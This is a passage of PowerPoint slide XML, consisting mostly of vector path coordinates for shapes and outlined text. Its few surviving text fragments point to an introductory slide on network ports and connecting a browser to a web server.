                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743046" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="755739" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="755739" y="51461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759104" y="48706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762627" y="46471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="769899" y="43016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="773188" y="42248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="790068" y="42248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="790068" y="40735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="755739" y="40735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="755739" y="29874"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="790068" y="42248"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="782118" y="42248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785664" y="42655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787703" y="43016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="789390" y="43422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="790068" y="43422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="790068" y="42248"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="786612" y="29874"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="775559" y="29874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="772903" y="30438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="765224" y="33825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760775" y="36693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="755739" y="40735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="790068" y="40735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="790068" y="30438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="790212" y="30438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="786612" y="29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5" name="object 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A202AF1-39C4-F407-8EF7-350CE2A42FA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3206" y="2177417"/>
              <a:ext cx="626733" cy="692664"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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A2F19477-755A-9701-4245-224D39DD73A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3828161" y="2179078"/>
              <a:ext cx="3531870" cy="1788795"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3531870" h="1788795">
                  <a:moveTo>
                    <a:pt x="1010716" y="941628"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1009548" y="928128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1014501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1168" y="1028001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1010716" y="941628"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3531870" h="1788795">
                  <a:moveTo>
                    <a:pt x="3531362" y="1777974"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2435199" y="934567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3497808" y="10223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3488906" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420074" y="929754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2424519" y="934885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420391" y="940231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3523094" y="1788706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3531362" y="1777974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7" name="object 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31856F8B-977F-8379-84D4-3F127312A58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1859" y="2516851"/>
              <a:ext cx="2107455" cy="1197818"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87D8AC1B-04AC-5A2B-3162-68A77392A682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1" name="object 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFCFE363-F9E9-F750-4937-616D7C9EBBDF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75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40023877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C0B4CB6-0E06-F736-5B91-D264DAD5B4C5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Ports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Examples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44C1936-C087-300C-F3E8-96114BF3E976}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1117716"/>
            <a:ext cx="75609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browser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local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3028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connect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web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server...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7544081-C9EC-7604-8418-BB98E6CF9E07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7497391" y="4678558"/>
            <a:ext cx="556260" cy="105410"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="33290" y="2294"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="2294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="102710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13370" y="102710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13370" y="65280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33922" y="65280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39862" y="64416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49325" y="60954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53413" y="58357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57876" y="53884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13370" y="53884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13370" y="13758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59961" y="13758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57523" y="11127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50454" y="6408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46750" y="4823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38394" y="2800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33290" y="2294"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="59961" y="13758"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="30805" y="13758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34306" y="14061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39839" y="15275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51809" y="35946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51380" y="38619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30015" y="53884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57876" y="53884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59646" y="52109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61837" y="48815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64931" y="41216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65699" y="37091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65636" y="26503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64660" y="21964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60482" y="14320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59961" y="13758"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="110824" y="25290"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="78375" y="48598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76021" y="65079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76609" y="73800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103243" y="104135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110824" y="104801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118349" y="104135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125072" y="102137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130995" y="98807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136119" y="94145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136312" y="93874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104003" y="93874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98723" y="91458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89120" y="55322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91017" y="48074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98606" y="38585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103958" y="36215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136286" y="36215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136119" y="35980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130995" y="31303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125072" y="27962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118349" y="25958"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110824" y="25290"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="136286" y="36215"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="117622" y="36215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122930" y="38585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130563" y="48074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132483" y="55322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132483" y="74611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130628" y="81551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130563" y="81792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122862" y="91458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117577" y="93874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136312" y="93874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140253" y="88333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143098" y="81792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143202" y="81551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144971" y="73800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145560" y="65079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144971" y="56356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143202" y="48598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140253" y="41806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136286" y="36215"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="180363" y="27661"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="167693" y="27661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167693" y="102710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180363" y="102710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180363" y="49230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183751" y="46489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187252" y="44251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194547" y="40789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197875" y="40026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214715" y="40026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214715" y="38509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180363" y="38509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180363" y="27661"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="214715" y="40026"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="206765" y="40026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210311" y="40430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212283" y="40789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214038" y="41205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214715" y="41205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214715" y="40026"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="211237" y="27661"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200151" y="27661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197528" y="28223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189849" y="31594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185400" y="34462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180363" y="38509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214715" y="38509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214715" y="28223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214938" y="28223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211237" y="27661"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="241343" y="38035"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="228673" y="38035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228673" y="87222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="230660" y="93852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238678" y="102125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="244527" y="104194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254419" y="104194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="256926" y="103991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="262550" y="103182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265147" y="102665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267179" y="102125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267519" y="102125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267519" y="93066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251958" y="93066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250033" y="92763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249550" y="92763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245977" y="91043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241433" y="79409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241343" y="38035"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="267519" y="90639"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="266841" y="90639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265847" y="91043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="264244" y="91549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259750" y="92763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="257581" y="93066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267519" y="93066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267519" y="90639"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="267519" y="27381"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="220090" y="27381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220090" y="38035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267519" y="38035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267519" y="27381"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="241343" y="5733"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="228673" y="5733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228673" y="27381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241343" y="27381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241343" y="5733"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="311424" y="27381"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="295321" y="27381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295321" y="46599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311424" y="46599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311424" y="27381"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="311424" y="83490"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="295321" y="83490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295321" y="102710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311424" y="102710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311424" y="83490"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="440588" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="420984" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="413079" y="2517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400680" y="12588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397563" y="18884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397563" y="31561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="413418" y="48690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="413418" y="49097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394876" y="83761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398105" y="90953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="430560" y="105002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="437747" y="104476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="444414" y="102895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="450420" y="100261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="456081" y="96370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457748" y="94954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="424259" y="94954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418951" y="92976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="410595" y="85063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="408494" y="80051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="408494" y="69214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="409714" y="64944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="414512" y="57549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="414615" y="57391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="417867" y="54401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="421910" y="52197"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="452783" y="52197"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446798" y="49634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446798" y="49230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="452287" y="46757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="453212" y="45994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="438442" y="45994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="435483" y="45138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411114" y="20300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="412944" y="16657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="420065" y="11342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419898" y="11342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="424823" y="9915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457926" y="9915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448723" y="2517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448958" y="2517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="440588" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="452783" y="52197"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="421910" y="52197"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="426088" y="53726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429453" y="54918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="434490" y="56628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436793" y="57549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="452332" y="81893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="450367" y="86524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="442507" y="93269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="437245" y="94954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457748" y="94954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="462856" y="90616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466244" y="83399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466244" y="68609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="464573" y="63573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457910" y="55659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="453100" y="52333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="452783" y="52197"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="457926" y="9915"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="436229" y="9915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="440972" y="11342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448402" y="17050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="450254" y="20884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="450202" y="30100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="449396" y="33561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="445985" y="39947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="442891" y="43027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="438442" y="45994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="453212" y="45994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="456442" y="43330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="462111" y="34562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="463534" y="30100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="463534" y="18141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="460553" y="12026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457926" y="9915"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="521081" y="270"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="488448" y="29327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="486351" y="52468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="486871" y="65090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="488299" y="74925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="488417" y="75734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521081" y="104801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="529393" y="104011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536543" y="101640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="542528" y="97688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546025" y="93674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="516564" y="93674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="513140" y="92795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512093" y="92156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="507530" y="89065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="505429" y="86389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="504025" y="83085"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502439" y="79443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502312" y="79152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="501332" y="75162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="501274" y="74925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="500280" y="65484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="500031" y="59617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="500058" y="45633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="516835" y="11398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="545923" y="11398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="542706" y="7572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536712" y="3516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="529503" y="1082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521081" y="270"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="545923" y="11398"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="525349" y="11398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="528850" y="12274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="534270" y="15781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536459" y="18434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537997" y="21851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="539623" y="25358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540631" y="29327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540709" y="29650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541836" y="39699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="542107" y="45633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="542097" y="59617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541846" y="65090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541817" y="65484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540734" y="74925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540707" y="75162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="539718" y="79152"/>
